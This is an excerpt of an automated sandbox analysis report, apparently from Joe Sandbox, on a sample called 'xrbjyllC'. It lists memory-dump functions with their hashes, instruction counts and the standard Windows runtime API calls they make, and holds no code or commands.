                                                                                              • Opcode ID: cf4c176f696ade204d3c41e6ae6d159ce2d129d12496bae992a971b87c5e1347
                                                                                              • Instruction ID: f0d72c51c7d12622977221f0caec622a42a83c7a3397a22742332590517d600b
                                                                                              • Opcode Fuzzy Hash: cf4c176f696ade204d3c41e6ae6d159ce2d129d12496bae992a971b87c5e1347
                                                                                              • Instruction Fuzzy Hash: 67415935A005189FDF14CB99D845ADDB7F6FF88711F088065E908EB264DB35EE41CBA0
                                                                                              Function 2B1E0438 Relevance: .1, Instructions: 118COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2047055184.000000002B1E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B1E0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_2b1e0000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c19804a55c46c0da06a7e61cc19161188cc2fbefe230e255442ec7bafc076704
                                                                                              • Instruction ID: 35ad7fa67d1080bd7c767032e07c459911de09e236e9253623ee0c9aca9c0542
                                                                                              • Opcode Fuzzy Hash: c19804a55c46c0da06a7e61cc19161188cc2fbefe230e255442ec7bafc076704
                                                                                              • Instruction Fuzzy Hash: 72412330A00B018FD724CF29D19A746B7F1FF49244F000A2DE88ACBA51E775FA58CBA1
                                                                                              Function 2B1E1EF0 Relevance: .1, Instructions: 84COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2047055184.000000002B1E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B1E0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_2b1e0000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: eae518396f454631c3d97fb20be96b665445605553f36ff8ddf6333844630412
                                                                                              • Instruction ID: 3dbbaf61ff410c3924b715f5c16bc93870a0147692e8625f56f2e70901ec17ce
                                                                                              • Opcode Fuzzy Hash: eae518396f454631c3d97fb20be96b665445605553f36ff8ddf6333844630412
                                                                                              • Instruction Fuzzy Hash: 3B31A571E0064A9FCF54DFA8C8419EFFBB5FFA8210B144519E514B7200DB34BA46CBA0
                                                                                              Function 2B1E0FE4 Relevance: .1, Instructions: 81COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2047055184.000000002B1E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B1E0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_2b1e0000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 98c015e7667cab75fc3284311a8a2ec626a44d5a1221093ab9df811710ea9bea
                                                                                              • Instruction ID: e52f71be8fe31b410766b52eae6834e5b3597c1a1a04e2f10d11921d9b126243
                                                                                              • Opcode Fuzzy Hash: 98c015e7667cab75fc3284311a8a2ec626a44d5a1221093ab9df811710ea9bea
                                                                                              • Instruction Fuzzy Hash: 84217171E0064A9FCF54DFA9C8419EFFBB5FF98210B148519E519B3204D734BA56CBA0
                                                                                              Function 24EAD5E8 Relevance: .1, Instructions: 75COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2035844176.0000000024EAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 24EAD000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_24ead000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 006f46f2a0855d2bda7e81bb7823dcc197a1b9cf0913127191876c89b76de6a7
                                                                                              • Instruction ID: 736f08338245fec4f78beced7c48c9f7a9f01d3c83a91659f869f4f0a0c3a319
                                                                                              • Opcode Fuzzy Hash: 006f46f2a0855d2bda7e81bb7823dcc197a1b9cf0913127191876c89b76de6a7
                                                                                              • Instruction Fuzzy Hash: 42210671500204DFEB06DF14D9C0F0ABFA6FBD4314F2889A9D90D0F256C736D456CAA1
                                                                                              Function 24EBD030 Relevance: .1, Instructions: 72COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2035928079.0000000024EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 24EBD000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_24ebd000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 8d2a80b276d4e5645681bb066964dada5e64b6aa67351723d60e3f2d5ce95582
                                                                                              • Instruction ID: c1259aa0fdd400420a739cc401990bd04c20c695ac534014d2cc51cca86fe85b
                                                                                              • Opcode Fuzzy Hash: 8d2a80b276d4e5645681bb066964dada5e64b6aa67351723d60e3f2d5ce95582
                                                                                              • Instruction Fuzzy Hash: 1B210771604604DFE706DF14E9C0F1ABBA6FB84318F20C5ADD9894B256C336D847CB61
                                                                                              Function 24EBD005 Relevance: .1, Instructions: 72COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2035928079.0000000024EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 24EBD000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_24ebd000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 67babbc5dd2affe38ddd79d43857355d1bd6b107cfab806d074c3a733a6ac6f5
                                                                                              • Instruction ID: 88f881392334bb1500ba274561d6d978d78abd4815aea0244ae147e88b322603
                                                                                              • Opcode Fuzzy Hash: 67babbc5dd2affe38ddd79d43857355d1bd6b107cfab806d074c3a733a6ac6f5
                                                                                              • Instruction Fuzzy Hash: 47216B715097C49FD703CF24D994B05BF71EB46218F29C5DBD8888F2A7C23A981ACB62
                                                                                              Function 2B1E0BF8 Relevance: .1, Instructions: 59COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2047055184.000000002B1E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B1E0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_2b1e0000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4970e293d84cf66728c44a97fe2c78ca8bed477dbbbcdd7bb86ef765b8d95a4e
                                                                                              • Instruction ID: 6fd4afc0020c9cff76f30bde8b0d1ba37475ba81c0e3a3bbd9bba4e328e3583c
                                                                                              • Opcode Fuzzy Hash: 4970e293d84cf66728c44a97fe2c78ca8bed477dbbbcdd7bb86ef765b8d95a4e
                                                                                              • Instruction Fuzzy Hash: 97115431201F00CBEB245A70D4AAB16B3A2EF94355F20497ED95E87790CA36FF42CB61
                                                                                              Function 24EAD5E3 Relevance: .1, Instructions: 56COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2035844176.0000000024EAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 24EAD000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_24ead000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: db79b5eb69be54bde6d22b58705b80061de706f1e28455fb2d9027648eeca995
                                                                                              • Instruction ID: 8fa2addd0c19bb942c030e94e28500cefebdf7fc8067d3ed43696d1932d34a03
                                                                                              • Opcode Fuzzy Hash: db79b5eb69be54bde6d22b58705b80061de706f1e28455fb2d9027648eeca995
                                                                                              • Instruction Fuzzy Hash: 7511B176504240CFDB02CF10D9C4B0ABF72FB94318F28C5A9D9090F256C336D55ACBA2
                                                                                              Function 2B1E0690 Relevance: .1, Instructions: 56COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2047055184.000000002B1E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B1E0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_2b1e0000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 578640d5a43f39f329819837971e55d4521591bc4cfa64bcce56127b39825011
                                                                                              • Instruction ID: b516fe2de3c4245ed2061db5ef8abf7cdcb37d35cf9a25e3f7fdcfdf02359d96
                                                                                              • Opcode Fuzzy Hash: 578640d5a43f39f329819837971e55d4521591bc4cfa64bcce56127b39825011
                                                                                              • Instruction Fuzzy Hash: 2B2144B6C003498FDB10CF9AC484BDEFBF4EB88320F10856AE958A7210C374A645CFA5
                                                                                              Function 2B1E0698 Relevance: .1, Instructions: 52COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2047055184.000000002B1E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B1E0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_2b1e0000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 846e3790020c4e2fba6478db883e661b6c0a0c0377e1c0435bb98e2ebd256676
                                                                                              • Instruction ID: 7d599c4913d66eca25f89daf479a4d505145be5776e88d778efd1798aa46d0d6
                                                                                              • Opcode Fuzzy Hash: 846e3790020c4e2fba6478db883e661b6c0a0c0377e1c0435bb98e2ebd256676
                                                                                              • Instruction Fuzzy Hash: 921104B6D003498FDB10CF9AD544ADEFBF4EB88360F10852AE959B7210C375AA45CFA5
                                                                                              Function 2B1E1E72 Relevance: .0, Instructions: 47COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2047055184.000000002B1E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B1E0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_2b1e0000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 771f1c635235b4fe108e53d117ca3d60c037e2cf12976be268e49ed6eebfb35e
                                                                                              • Instruction ID: 1f88f98994aa988411b47a73e4def8bc0f05a80326d465650ffafbdb3518f11c
                                                                                              • Opcode Fuzzy Hash: 771f1c635235b4fe108e53d117ca3d60c037e2cf12976be268e49ed6eebfb35e
                                                                                              • Instruction Fuzzy Hash: C01140300063868FCB16EFBCC9D89447F72EF467003651BA9C2944B19ADF366529CB61
                                                                                              Function 24EAD005 Relevance: .0, Instructions: 45COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2035844176.0000000024EAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 24EAD000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_24ead000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a14ff1a33dd692c36266a79772ecb11cedbdabe136fe53d21ba25d552ddca7e1
                                                                                              • Instruction ID: 682132ee20b231b5d7803d45476d8aec2c432354a029616a5d5696fad052e798
                                                                                              • Opcode Fuzzy Hash: a14ff1a33dd692c36266a79772ecb11cedbdabe136fe53d21ba25d552ddca7e1
                                                                                              • Instruction Fuzzy Hash: 4A01526100E3C05EE7034B259894B56BFB5EF53628F19C5DBD9888F193C2695849C772
                                                                                              Function 24EAD01D Relevance: .0, Instructions: 45COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2035844176.0000000024EAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 24EAD000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_24ead000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e5c4b55cae09bafd23ed97655097a6f5cd525d9e52c3a03a375a7e579f9e0276
                                                                                              • Instruction ID: ec3b72ffdf7e616cb652314b15b26fa5ad24367c92a7ed1b1ff72c9d5273edee
                                                                                              • Opcode Fuzzy Hash: e5c4b55cae09bafd23ed97655097a6f5cd525d9e52c3a03a375a7e579f9e0276
                                                                                              • Instruction Fuzzy Hash: 1A01F7711083509AF3014A25D9C4F5BBFDAEF41728F08C569ED484E186CA799841C6B1
                                                                                              Function 2B1E1E92 Relevance: .0, Instructions: 36COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2047055184.000000002B1E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B1E0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_2b1e0000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f33f64f12e878971ccdb9b28079d5a7ffbe96fcd3f10674021d82e5e2df8ea82
                                                                                              • Instruction ID: 82ed6678d9cf8f3b14530ffb66897b409eba08d2061ea1b8e585198e1c2ce030
                                                                                              • Opcode Fuzzy Hash: f33f64f12e878971ccdb9b28079d5a7ffbe96fcd3f10674021d82e5e2df8ea82
                                                                                              • Instruction Fuzzy Hash: 3CF03734304B508FCB1ADB68E445A1977E1FF8A701B0004AAE245CB7B2CB74ED96CBA1
                                                                                              Function 2B1E4E10 Relevance: .0, Instructions: 34COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2047055184.000000002B1E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B1E0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_2b1e0000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1a6ca72f40902ff27c5c150f53fb73ac2926f4b89c23276abd80970c626a7ccb
                                                                                              • Instruction ID: 57571fea523f63f94175e39f3bf29dcba9526312d06bd5069f9d487bf59304ae
                                                                                              • Opcode Fuzzy Hash: 1a6ca72f40902ff27c5c150f53fb73ac2926f4b89c23276abd80970c626a7ccb
                                                                                              • Instruction Fuzzy Hash: 9EF06731E001289FCF08EA98D8846DDBBB6EF89310F04817ADA24A7244DB306956CB61
                                                                                              Function 2B1E0BEA Relevance: .0, Instructions: 32COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2047055184.000000002B1E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B1E0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_2b1e0000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 13520502000860b1c91ea140bd778016c681c5f503b4364f17e80f00f3896431
                                                                                              • Instruction ID: 296b0d006a02d9f3b303e967e045a517ec2d5da3c2fafb178096b49d68fa3ae5
                                                                                              • Opcode Fuzzy Hash: 13520502000860b1c91ea140bd778016c681c5f503b4364f17e80f00f3896431
                                                                                              • Instruction Fuzzy Hash: A5F0E231505B008FDB218A78D58D9A9BBA2EF85361B1005ABD86CC3551CA25AA41C772
                                                                                              Function 2B1E1EA0 Relevance: .0, Instructions: 30COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2047055184.000000002B1E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B1E0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_2b1e0000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5621f328fa8a4b51ed698feb5147656b574d834075e69b81986ff0a7e08054ac
                                                                                              • Instruction ID: 8442298390f57574ac5c177113d2ee9e0a8a55480c1cf7cf6620b8a928c89357
                                                                                              • Opcode Fuzzy Hash: 5621f328fa8a4b51ed698feb5147656b574d834075e69b81986ff0a7e08054ac
                                                                                              • Instruction Fuzzy Hash: 9EF05E34300A108FCB19DF28E441A5973E5FF88711B0005A9E14A8B771CB74EC81CBA4
                                                                                              Function 2B1E0CC4 Relevance: .0, Instructions: 21COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2047055184.000000002B1E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B1E0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_2b1e0000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 8657c5e46e4171956d8704a547ff1e94a6400ee4edf4f3dddc789fb20b3296ad
                                                                                              • Instruction ID: d66b3d21bcf83f11f3e8dfd226dbeeb49c1aa60ef9b0f7c1bb699e3d4c541eaa
                                                                                              • Opcode Fuzzy Hash: 8657c5e46e4171956d8704a547ff1e94a6400ee4edf4f3dddc789fb20b3296ad
                                                                                              • Instruction Fuzzy Hash: 14E07D2630D5908FCB0207A67CBA0A2BF10E99108134941D7D18DCE022C9049702C320
                                                                                              Function 2B1E0C9F Relevance: .0, Instructions: 16COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2047055184.000000002B1E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B1E0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_2b1e0000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: aeb2a036fcae1f949c23e373284aa9c8bdfee921ab0eeb1b95ac5802fba2b92a
                                                                                              • Instruction ID: 3227b9f287a87574599fbcb30220d393c09199e869593591acb295ec2748c0db
                                                                                              • Opcode Fuzzy Hash: aeb2a036fcae1f949c23e373284aa9c8bdfee921ab0eeb1b95ac5802fba2b92a
                                                                                              • Instruction Fuzzy Hash: CBD01730404A448FC700DF78E599A917BF4AF4A204B1445E6D84D8BA27C632E9168F51
                                                                                              Function 2B1E171B Relevance: .0, Instructions: 12COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2047055184.000000002B1E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B1E0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_2b1e0000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5cda2f2bc2b29b41f67aedeb47ccf74a0af9ca8d9f54c3ebf1ccdf6da4c109b3
                                                                                              • Instruction ID: 4a6102d35412d1560889fe73b8a767837f4f7910d7242dd7f4cb685b8a1550c6
                                                                                              • Opcode Fuzzy Hash: 5cda2f2bc2b29b41f67aedeb47ccf74a0af9ca8d9f54c3ebf1ccdf6da4c109b3
                                                                                              • Instruction Fuzzy Hash: A8D0127AE44218DB8F10CF84F4418DDF331FBC4230B108166C91867204C2316A52CFA0
                                                                                              Function 2B1E4DF0 Relevance: .0, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2047055184.000000002B1E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B1E0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_2b1e0000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b75ecefaf7f02dfe1615bad52081af44969930823e1e2eb3067fe3b61648ab07
                                                                                              • Instruction ID: aac240740cb4ffb5d44722e1ba6e443a261a489419f0e865d0f0904c398bb21d
                                                                                              • Opcode Fuzzy Hash: b75ecefaf7f02dfe1615bad52081af44969930823e1e2eb3067fe3b61648ab07
                                                                                              • Instruction Fuzzy Hash: 13C04C204493944ECF4267B458951807F20DE6B300B4614E6C1648B55699543599EB23
                                                                                              Function 2B1E0CB0 Relevance: .0, Instructions: 8COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2047055184.000000002B1E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B1E0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_2b1e0000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4055f8bebb1f09e3430c6095b42012c1cc66e4952e1761faa242fe6affef8bb3
                                                                                              • Instruction ID: 3bbf454b5b9fc03ef957e261e241749e4bd707ce72a56f356b2931b7ea99cff3
                                                                                              • Opcode Fuzzy Hash: 4055f8bebb1f09e3430c6095b42012c1cc66e4952e1761faa242fe6affef8bb3
                                                                                              • Instruction Fuzzy Hash: 3DC04834260208CFC244DB68E488D60B3E9AB48A18B2180E9E90D8B723CB32F8128A50

                                                                                              Non-executed Functions

                                                                                              Function 0040CE09 Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • IsDebuggerPresent.KERNEL32 ref: 004136F4
                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00413709
                                                                                              • UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 00413714
                                                                                              • GetCurrentProcess.KERNEL32(C0000409), ref: 00413730
                                                                                              • TerminateProcess.KERNEL32(00000000), ref: 00413737
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000001.1826572703.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000B.00000001.1826572703.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 0000000B.00000001.1826572703.0000000000445000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_1_400000_xrbjyllC.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                              • String ID:
                                                                                              • API String ID: 2579439406-0
                                                                                              • Opcode ID: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                              • Instruction ID: 93bf0ba95bc2a0faef8203f21c221f33afe887fd41373e09ae0fa508b254143b
                                                                                              • Opcode Fuzzy Hash: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                              • Instruction Fuzzy Hash: A521C3B4601204EFD720DF65E94A6457FB4FB08356F80407AE50887772E7B86682CF4D
                                                                                              Function 00417081 Relevance: 31.8, APIs: 21, Instructions: 340COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004170B3
                                                                                              • GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,00000000), ref: 004170C5
                                                                                              • MultiByteToWideChar.KERNEL32(7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00417151
                                                                                              • _malloc.LIBCMT ref: 0041718A
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171BD
                                                                                              • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171D9
                                                                                              • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00417213
                                                                                              • _malloc.LIBCMT ref: 0041724C
                                                                                              • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00417277
                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041729A
                                                                                              • __freea.LIBCMT ref: 004172A4
                                                                                              • __freea.LIBCMT ref: 004172AD
                                                                                              • ___ansicp.LIBCMT ref: 004172DE
                                                                                              • ___convertcp.LIBCMT ref: 00417309
                                                                                              • LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?), ref: 0041732A
                                                                                              • _malloc.LIBCMT ref: 00417362
                                                                                              • _memset.LIBCMT ref: 00417384
                                                                                              • LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?), ref: 0041739C
                                                                                              • ___convertcp.LIBCMT ref: 004173BA
                                                                                              • __freea.LIBCMT ref: 004173CF
                                                                                              • LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004173E9
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000001.1826572703.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000B.00000001.1826572703.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 0000000B.00000001.1826572703.0000000000445000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_1_400000_xrbjyllC.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: String$ByteCharMultiWide__freea_malloc$___convertcp$ErrorLast___ansicp_memset
                                                                                              • String ID:
                                                                                              • API String ID: 3809854901-0
                                                                                              • Opcode ID: 3d09e5343aa18fab3ca4e2e74db44cf1cccdb49efdd84c094ede33f31d65ba6e
                                                                                              • Instruction ID: cdfffc9a1d2b3026f9ae82d5cc8d175594050d3ba9b5f3d3ede674b9b5b9b85c
                                                                                              • Opcode Fuzzy Hash: 3d09e5343aa18fab3ca4e2e74db44cf1cccdb49efdd84c094ede33f31d65ba6e
                                                                                              • Instruction Fuzzy Hash: 29B1B072908119EFCF119FA0CC808EF7BB5EF48354B14856BF915A2260D7398DD2DB98
                                                                                              Function 004057B0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 205COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _malloc.LIBCMT ref: 004057DE
                                                                                                • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                                                • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                                                • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                                              • _malloc.LIBCMT ref: 00405842
                                                                                              • _malloc.LIBCMT ref: 00405906
                                                                                              • _malloc.LIBCMT ref: 00405930
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000001.1826572703.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000B.00000001.1826572703.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 0000000B.00000001.1826572703.0000000000445000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_1_400000_xrbjyllC.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: _malloc$AllocateHeap
                                                                                              • String ID: 1.2.3
                                                                                              • API String ID: 680241177-2310465506
                                                                                              • Opcode ID: 1371ffb49ce3b8dee1113081a69af0fad64233f45308895947edc3c59a7df708
                                                                                              • Instruction ID: 6f54ea0e5a0cddcbb7a6eab5c61130b8c10e9e343dc86a4c4a61a5a67c51a18e
                                                                                              • Opcode Fuzzy Hash: 1371ffb49ce3b8dee1113081a69af0fad64233f45308895947edc3c59a7df708
